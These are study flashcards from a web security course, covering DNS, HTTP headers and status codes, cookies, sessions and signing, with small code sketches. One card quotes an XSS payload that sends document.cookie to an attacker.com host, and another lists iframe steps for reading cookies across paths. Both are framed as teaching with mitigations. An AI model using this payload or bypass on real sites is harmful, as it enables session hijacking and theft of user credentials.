CS 253 Web Security Youtube Pt1 Flashcards
What is the difference between a vulnerability and an exploit?
A vulnerability is a weakness in a system that could let an attacker make it behave in unintended ways. An exploit is the code or technique that takes advantage of a vulnerability to carry out an attack.
What reasons are there to attack a computer system?
Spam - To trick people into clicking things
Denial of service - To attack competitors or seek ransom
Infect visiting users with malware - infect one server, use it to infect hundreds of thousands of clients
Data theft - credentials, credit card numbers, intellectual property
Mine cryptocurrency
Ransomware
Political motivations
What does web security involve?
Browser security, server app security, client app security
It also involves actions to protect the user from:
- Social engineering
- Trackers (private data being leaked)
Why is web security hard?
- The web aims to let anyone’s code run on your computer safely, that is, to run untrusted code securely.
- Different sites may interact with each other
- Websites have a lot of low-level features (hardware access)
- There is a desire for high performance
- APIs for web browsers were not designed from first principles. They have evolved over time
- Web has strict backwards compatibility requirements. There can be no changes that break previous versions because they could break websites.
What can websites do that constitutes a very high security risk?
- Download content from anywhere
- Spawn worker processes
- Open sockets to a server, or even to another user’s browser
- Display media in a huge number of formats
- Run custom code on the GPU
- Save/read data from the filesystem
What does DNS stand for?
Domain Name System
What is the Domain Name System?
A system that translates user friendly domain names into IP addresses
How does DNS querying work?
The client machine sends the domain name to the DNS server and the server responds with the corresponding IP address.
How does the DNS server work when performing a DNS query?
The client machine sends the domain name to the DNS server.
The DNS server acts as a DNS Recursive Resolver to look up the answer for the domain name. It queries a chain of other servers, each of which either answers or refers it to the next server to ask, until it gets the IP address.
The queried servers are called nameservers. There are many of them because no single server can hold the records for every existing domain name.
What is a good example of a DNS querying process?
Let’s say we try to access the URL: https://www.stanford.edu
The client sends the domain name (www.stanford.edu) to the DNS Server.
The DNS Server, using the DNS Recursive Resolver, queries the Root Nameserver. The Root Nameserver does not have the IP address, so it responds with the instruction to query the “.edu” Nameserver.
The DNS Recursive Resolver queries the “.edu” Nameserver. The “.edu” Nameserver does not have the IP address, so it responds with the instruction to query the “stanford.edu” Nameserver.
The DNS Recursive Resolver queries the “stanford.edu” Nameserver. The “stanford.edu” Nameserver does have the IP address, so it returns it.
The DNS Recursive Resolver returns the received IP address to the Client.
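The walk-through above can be sketched as a toy simulation. This is only an illustration: the three lookup tables, the server labels, the address 192.0.2.10 and the function name resolve are all made up here, and a real resolver sends network queries and caches the answers.

```python
# Toy model of recursive DNS resolution. Every table below is hypothetical
# in-memory data standing in for a real nameserver.
ROOT = {"edu": "edu-nameserver"}  # the root only knows who handles each TLD
TLD_SERVERS = {"edu-nameserver": {"stanford.edu": "stanford-nameserver"}}
DOMAIN_SERVERS = {"stanford-nameserver": {"www.stanford.edu": "192.0.2.10"}}


def resolve(hostname):
    """Return (ip, trail), where trail lists the servers queried in order."""
    labels = hostname.split(".")
    tld = labels[-1]
    domain = ".".join(labels[-2:])

    trail = ["root"]
    tld_server = ROOT[tld]                            # root: "ask the .edu nameserver"
    trail.append(tld_server)
    domain_server = TLD_SERVERS[tld_server][domain]   # TLD: "ask the domain nameserver"
    trail.append(domain_server)
    ip = DOMAIN_SERVERS[domain_server][hostname]      # domain nameserver has the answer
    return ip, trail
```

Calling resolve("www.stanford.edu") walks the root, TLD and domain tables in that order, mirroring the three queries in the card.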
What is a TLD Nameserver?
It is the nameserver that holds all the instructions (referrals) or addresses for a top-level domain.
Example:
.com
.org
.edu
What does the TLD in TLD Nameserver stand for?
Top-Level Domain
What is a top-level domain?
It is the part of the domain name after the last dot. It is used to indicate the type or category of a website.
Examples:
.com
.org
.edu
What does SLD stand for, regarding domain names?
Second-Level Domain
What is a second-level domain?
It is the part of the domain name directly before the top-level domain. It indicates the name of the website
Examples:
wikipedia.com = wikipedia
brainscape.com = brainscape
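As a rough sketch, the two parts can be pulled out of a domain name by splitting on dots. The function name split_domain is hypothetical, and the split is deliberately naive: it assumes a single-label TLD and ignores multi-label suffixes such as "co.uk".

```python
def split_domain(name):
    """Naive split: the last label is the TLD, the label before it is the SLD.

    Assumption: single-label TLDs only (no handling of suffixes like "co.uk").
    """
    labels = name.lower().rstrip(".").split(".")
    if len(labels) < 2:
        raise ValueError("expected at least two labels")
    return {"sld": labels[-2], "tld": "." + labels[-1]}
```

Subdomain labels such as "www" are simply ignored by this split.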
What is a Domain Nameserver?
The Nameserver that holds the information regarding a particular domain name
What is DNS hijacking?
The attacker changes the target’s DNS records to point to the attacker’s own IP address. After this, all site visitors are directed to the attacker’s web server.
What are the vectors (places) where DNS hijacking can occur?
- Malware changes user’s local DNS settings
- Hacked recursive DNS resolver
- Hacked router
- Hacked DNS nameserver
- Compromised user account at DNS provider
What does ISP stand for?
Internet Service Provider
Why is it easy for ISPs to sell lists of the domain names you have queried?
Because the queries are sent in plaintext.
What can you do to try and avoid ISPs selling your DNS queries lists?
You can consider switching your DNS settings to the Cloudflare resolver or to any other provider that at least has a good privacy policy.
What do HTTP Status Codes mean in general?
1xx - Informational (the request was received; hold on while processing continues)
2xx - Success
3xx - Redirection
4xx - Client error
5xx - Server error
What are some well-known HTTP Success status codes?
200 - OK - Request succeeded
204 - No Content - Request succeeded but answer is empty
206 - Partial Content - Request for specific byte range succeeded
What are some well-known HTTP Redirection status codes?
301 - Moved Permanently - Resource has a new permanent URL
302 - Found - Resource temporarily resides at a different URL
304 - Not Modified - Resource has not been modified since last cached
What are some well-known HTTP Client error codes?
400 - Bad Request - The request was malformed
401 - Unauthorized - Resource is protected, need to authenticate
403 - Forbidden - Resource is protected, denying access
404 - Not Found - Resource was not found
What are some well-known HTTP Server error codes?
500 - Internal Server Error - Generic Server Error
502 - Bad Gateway - Server is a proxy; backend server is unreachable
503 - Service Unavailable - Server is overloaded or down for maintenance
504 - Gateway Timeout - Server is a proxy, backend server responded too slowly
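The status code cards above can be checked against Python's standard library, which ships the official reason phrases in http.HTTPStatus. The CLASSES table and the describe function are names invented for this sketch.

```python
from http import HTTPStatus

# First digit of the status code -> general meaning, as in the cards above.
CLASSES = {
    1: "Informational",
    2: "Success",
    3: "Redirection",
    4: "Client error",
    5: "Server error",
}


def describe(code):
    """Return the code, its standard reason phrase and its class."""
    phrase = HTTPStatus(code).phrase   # raises ValueError for unknown codes
    return f"{code} {phrase} ({CLASSES[code // 100]})"
```

For instance, describe(404) combines the reason phrase "Not Found" with the "Client error" class.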
What can an HTTP Proxy server do or be useful for?
It can:
- Cache content
- Block content (malware, adult content, etc)
- Modify content
- Sit in front of many servers (reverse proxy)
What is a client-side proxy?
It is a proxy that sits between the client and the web, retrieving resources from the internet on the client’s behalf.
It is often used in corporate networks to control employee internet access, enforce content filters, and improve security.
What is another name for a client-side proxy?
Forward proxy
What is another name for a forward proxy?
A client-side proxy
What are the HTTP headers and what are they good for?
They are essentially a map of key-value pairs.
They let the client and the server pass additional information with an HTTP request or response, which allows experimental extensions to be added to HTTP without requiring protocol changes.
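To make the "map of key-value pairs" idea concrete, here is a minimal sketch that turns raw header lines into a dictionary. The function name parse_headers is hypothetical, and the sketch simplifies real HTTP: header names are lowercased because they are case-insensitive, and a repeated header simply overwrites the earlier value.

```python
def parse_headers(raw):
    """Parse 'Name: value' lines separated by CRLF into a dict.

    Simplification: a repeated header name keeps only the last value.
    """
    headers = {}
    for line in raw.split("\r\n"):
        if not line:
            continue                      # skip the blank line that ends the headers
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers
```

An unknown or experimental header needs no special handling: it is just one more key in the map.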
What are 11 of the most useful HTTP request headers?
Host
User-Agent
Referer
Cookie
Range
Cache-Control
If-Modified-Since
Connection
Accept
Accept-Encoding
Accept-Language
What is the Host, HTTP request header used for?
It is meant to contain the domain name of the server
What is the User-Agent, HTTP request header used for?
It is meant to contain the name of the browser and operating system.
Technically it contains the name of the user agent rather than of the browser, but the user agent is normally the browser.
What is the Referer, HTTP request header used for?
It is meant to contain the webpage which led you to this page (The word Referer is misspelled, but that’s how it is written in HTTP)
What is the Cookie, HTTP request header used for?
It is meant to send back the cookie the server gave you earlier. This is what keeps you logged in
What is the Range, HTTP request header used for?
Specifies a subset of bytes to fetch. This is the same Range concept that is used for HTTP 206 response status code.
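A minimal sketch of how a server might honor a Range header, assuming only the simple "bytes=start-end" and "bytes=start-" forms. The function name serve_range is hypothetical; 416 is the standard "Range Not Satisfiable" status, which is not covered in these cards.

```python
import re


def serve_range(body, range_header):
    """Return (status, payload) for a single 'bytes=start-end' range.

    Assumption: suffix ranges ('bytes=-5') and multiple ranges are not handled;
    anything unrecognized falls back to a normal 200 with the full body.
    """
    match = re.fullmatch(r"bytes=(\d+)-(\d*)", range_header.strip())
    if not match:
        return 200, body
    start = int(match.group(1))
    end = int(match.group(2)) if match.group(2) else len(body) - 1
    end = min(end, len(body) - 1)         # clamp to the last available byte
    if start > end:
        return 416, b""                   # requested range is outside the body
    return 206, body[start:end + 1]       # byte ranges are inclusive
```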
What is the Cache-Control, HTTP request header used for?
Helps to specify if you want a cached response or not.
What is the If-Modified-Since, HTTP request header used for?
Specifies a date and time; the server sends the full resource only if it has been modified since then. Otherwise it can answer with 304 Not Modified.
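The server-side decision can be sketched as follows. The function name conditional_status is hypothetical; the date parsing uses email.utils.parsedate_to_datetime from the standard library, and an unparseable header is treated as if it were absent.

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime


def conditional_status(last_modified, if_modified_since):
    """Return 304 if the resource is unchanged since the given date, else 200.

    last_modified must be a timezone-aware datetime; if_modified_since is the
    raw header value, or None when the header was not sent.
    """
    if if_modified_since is None:
        return 200
    try:
        since = parsedate_to_datetime(if_modified_since)
    except (TypeError, ValueError):
        return 200                        # ignore a header we cannot parse
    return 200 if last_modified > since else 304
```

With 304 the server sends no body, and the browser reuses its cached copy.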
What is the Connection, HTTP request header used for?
Sends instructions to control the TCP socket used for the request, either to keep it open or to close it. (keep-alive, close)
What is the Accept, HTTP request header used for?
You can specify which type of response you will accept
Example: text/html
What is the Accept-Encoding, HTTP request header used for?
You can specify which encoding algorithms you understand.
Example: gzip
What is the Accept-Language, HTTP request header used for?
You can specify which languages you prefer for the response.
Example: es, en
What are 12 of the most useful HTTP response headers?
Date
Last-Modified
Cache-Control
Expires
Vary
Set-Cookie
Location
Connection
Content-Type
Content-Encoding
Content-Language
Content-Length
What is the Date, HTTP response header used for?
It contains when the response was sent.
What is the Last-Modified, HTTP response header used for?
It contains when the content was last modified.
What is the Cache-Control, HTTP response header used for?
It specifies whether you want the client to cache the response or not
What is the Expires, HTTP response header used for?
Contains a date to point out when the browser should discard the response from cache.
What is the Vary, HTTP response header used for?
Contains a list of request headers that affect the response. The browser stores the values of those headers alongside the cached response and checks them on new requests: if the values differ, it does not use the cached version. Otherwise it does.
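One way to picture Vary is as extra fields in the cache key. The sketch below is an assumption about how a cache could be organized, not how any particular browser implements it, and the function name cache_key is made up.

```python
def cache_key(url, request_headers, vary):
    """Build a cache key from the URL plus the request headers named in Vary.

    Two requests share a cached response only if their keys are equal.
    """
    names = [n.strip().lower() for n in vary.split(",") if n.strip()]
    lowered = {k.lower(): v for k, v in request_headers.items()}
    return (url,) + tuple((n, lowered.get(n, "")) for n in sorted(names))
```

With "Vary: Accept-Encoding", a request that accepts gzip and one that accepts only br produce different keys, so neither is served the other's cached response.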
What is the Set-Cookie, HTTP response header used for?
Sets a cookie value on the client
What is the Location, HTTP response header used for?
Used to redirect the client to another URL. For a redirect, it has to be sent alongside a 3xx response.
What is the Connection, HTTP response header used for?
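Tells the client whether the server will keep the TCP connection open or close it (keep-alive, close). It is the response counterpart of the Connection request header.
What is the Content-Type, HTTP response header used for?
Specifies the media type of the response body (example: text/html). It is the response counterpart of the Accept request header.
What is the Content-Encoding, HTTP response header used for?
Specifies the encoding applied to the response body (example: gzip). It is the response counterpart of the Accept-Encoding request header.
What is the Content-Language, HTTP response header used for?
Specifies the language of the response content (example: en). It is the response counterpart of the Accept-Language request header.
What is the Content-Length, HTTP response header used for?
Specifies the size of the response body in bytes.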
What does HTTP stand for?
Hypertext Transfer Protocol
What does TLS stand for?
Transport Layer Security
What does TCP stand for?
Transmission Control Protocol
What does IP stand for?
Internet Protocol
What does the client need to do in order to find the IP of the site it wants to connect to?
It needs to request it through the DNS Server using the domain name
What does the client do after getting the IP address?
It opens a connection using TCP
What does the client do after opening the TCP connection?
It optionally sets up TLS encryption on top of the connection
What does the client do after opening the TCP connection and applying (or not) the TLS encryption?
It makes the HTTP request by using the socket opened by TCP.
What happens when you type a URL and press enter?
- Performs a DNS lookup on the hostname (example.com) to get an IP address (1.2.3.4)
- Opens a TCP socket to 1.2.3.4 on port 80 (The HTTP port)
- Sends an HTTP request that includes the desired path
- Reads the HTTP response from the socket
- Parses the HTML into the DOM
- Renders the page based on the DOM
- Repeats until all external resources are loaded:
  - If there are pending external resources, makes HTTP requests for them (repeating steps 1-4)
  - Renders the resources into the page
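The first four steps can be sketched with plain sockets. This is a bare-bones illustration with no TLS, redirects or HTML parsing; the function names build_request and fetch are hypothetical, and "Connection: close" is added so the server ends the response by closing the socket.

```python
import socket


def build_request(host, path="/"):
    """Build a minimal HTTP/1.1 GET request as bytes."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def fetch(host, path="/", port=80):
    """Return the raw HTTP response (status line, headers and body) as bytes."""
    ip = socket.gethostbyname(host)                       # step 1: DNS lookup
    with socket.create_connection((ip, port), timeout=10) as sock:  # step 2: TCP socket
        sock.sendall(build_request(host, path))           # step 3: send the request
        chunks = []
        while True:                                       # step 4: read the response
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)
```

Calling fetch("example.com") needs network access; parsing and rendering the returned HTML is the browser's job and is not sketched here.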
What is the syntax for a server to set a cookie on a client?
Set-Cookie: theme=dark;
What is the syntax for a client to send a cookie to the server?
Cookie: theme=dark;
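On the server side, the value of the Cookie header can be parsed with Python's standard http.cookies module. A small sketch, where the function name parse_cookie_header is made up:

```python
from http.cookies import SimpleCookie


def parse_cookie_header(value):
    """Turn the value of a Cookie request header into a plain dict."""
    jar = SimpleCookie()
    jar.load(value)
    return {name: morsel.value for name, morsel in jar.items()}
```

Several cookies arrive in a single header, separated by semicolons, and each becomes one entry in the dict.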
What is a session?
A mechanism by which a server keeps a set of data related to a user’s current “browsing session”
What are some examples in which sessions are commonly implemented?
Logins
Shopping carts
User tracking
What does the term “Access Control” refer to?
To the act of regulating who can view resources or take actions on a website.
What does the term “Ambient Authority” refer to?
To implementing Access Control, based on a global and persistent property of the requester.
Which types of Ambient Authority exist on the web?
4 in total:
Cookies - the most common and most versatile method
IP checking - used at Stanford for library resources.
Built-in HTTP Authentication - rarely used
Client Certificates - rarely used
What are the signature schemes normally used for implementing Ambient Authority with Cookies?
The triple of algorithms
- Generator
- Signer
- Verifier
What does the Generator function do?
It takes no input and returns a public key (pk) and a secret key (sk)
What does the Signer function do?
Receives the secret key and a value.
It uses the secret key to perform a series of operations on the value and returns a value called the tag (which is the signature of the value).
What does the Verifier function do?
It receives the public key, the original value and the tag.
Internally it performs a series of operations to check that the tag is valid for the original value.
How does the process of requests work using the Ambient Authority with Cookies?
- The server generates the pk and sk
- The browser sends a POST login request
- The server validates the user and password
- The server signs the username value and generates a tag
- Server sends back the tag and the username as cookies with the Set-Cookie header
- The Browser sets both cookies as instructed by the server
- The Browser sends future requests with both username and tag in the Cookie header
- The server verifies that the tag is valid for the username it received
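The sign-and-verify flow above can be sketched with the standard library. Note the substitution: this sketch uses HMAC-SHA256, a symmetric scheme with one secret key held only by the server, instead of a pk/sk pair, because Python's standard library has no asymmetric signatures. The function names generate_key, sign and verify are chosen here to mirror the Generator, Signer and Verifier cards.

```python
import hashlib
import hmac
import secrets


def generate_key():
    """Generator: no input, returns a fresh random secret key."""
    return secrets.token_bytes(32)


def sign(key, value):
    """Signer: returns the tag for value under key (hex-encoded HMAC-SHA256)."""
    return hmac.new(key, value.encode("utf-8"), hashlib.sha256).hexdigest()


def verify(key, value, tag):
    """Verifier: True only if tag is the valid tag for value under key."""
    return hmac.compare_digest(sign(key, value), tag)
```

The server would send the username and sign(key, username) as two cookies, then call verify on every later request. A client that edits the username cookie cannot produce a matching tag without the key.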
What are some cookie attributes you can specify?
Expires - Specifies expiration date. If no date, then lasts for a session
Path - Scope the “Cookie” header to a particular request path prefix
Domain - Allows the cookie to be scoped to a domain broader than the domain that returned the Set-Cookie header
What is the format for the Set-Cookie header sent by the server?
Example:
Set-Cookie: theme=dark; Expires=<date>;
How does Session hijacking work?
When cookies are sent over unencrypted HTTP, anyone on the network path can intercept them and use them to hijack the user’s session.
Once the attacker has the victim’s cookie, they can send it as if it were their own, and the server will be fooled into thinking the attacker is the owner of the session.
How can you mitigate a Session hijacking attack?
- You can add the Secure cookie attribute to prevent the cookie from being sent over unencrypted HTTP connections.
Set-Cookie: key=value; Secure
- You can use HTTPS for the entire website
Why does using HTTPS mitigate a Session hijacking attack?
Because the data transferred during HTTPS communication is encrypted.
What is a very common form of JS code used in Session hijacking via Cross Site Scripting?
new Image().src = 'https://attacker.com/steal?cookie=' + document.cookie
What does XSS stand for?
Cross Site Scripting
What can you do to protect your cookies from XSS?
You can add the attribute HttpOnly to your Set-Cookie header.
This way the cookies will not be accessible through JavaScript, only through HTTP.
Set-Cookie: key=value; Secure; HttpOnly
Why would one attempt to use the Path attribute for security?
Because the Path attribute allows you to limit the sharing of a cookie to only a specific url path and therefore on paper it wouldn’t allow other unwanted paths to access the cookie.
Why is it not recommended to use the Path attribute for security?
Because the Path attribute does not protect against unauthorized reading of the cookie from a different path on the same origin.
It can be bypassed using an <iframe> tag
What are the steps needed to bypass the Path attribute?
- Go to another page on the same origin and create an iframe element in JavaScript:
const iframe = document.createElement('iframe')
- Assign the URL whose cookies you want to the iframe src
iframe.src = 'https://web.stanford.edu/class/cs106a'
- Add the iframe to the page so that it loads
document.body.appendChild(iframe)
- Access the document object of the page loaded by the iframe
iframe.contentDocument.cookie
With this you already have unauthorized access to said cookie
What is the best-practice recommendation when using the Path cookie attribute?
Never rely on it for security.
Instead, set it to the broadest possible value: Path=/
Example:
Set-Cookie: key=value; Secure; HttpOnly; Path=/
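A header like the one in the example above can be generated with Python's standard http.cookies module rather than assembled by hand. In this sketch the function name session_cookie_header is hypothetical, and the module decides the order in which the attributes are written, so it may differ from the example.

```python
from http.cookies import SimpleCookie


def session_cookie_header(name, value):
    """Build a Set-Cookie header line with Secure, HttpOnly and Path=/ set."""
    jar = SimpleCookie()
    jar[name] = value
    jar[name]["secure"] = True      # only sent over HTTPS
    jar[name]["httponly"] = True    # hidden from document.cookie
    jar[name]["path"] = "/"         # broadest path, as recommended above
    return "Set-Cookie: " + jar[name].OutputString()
```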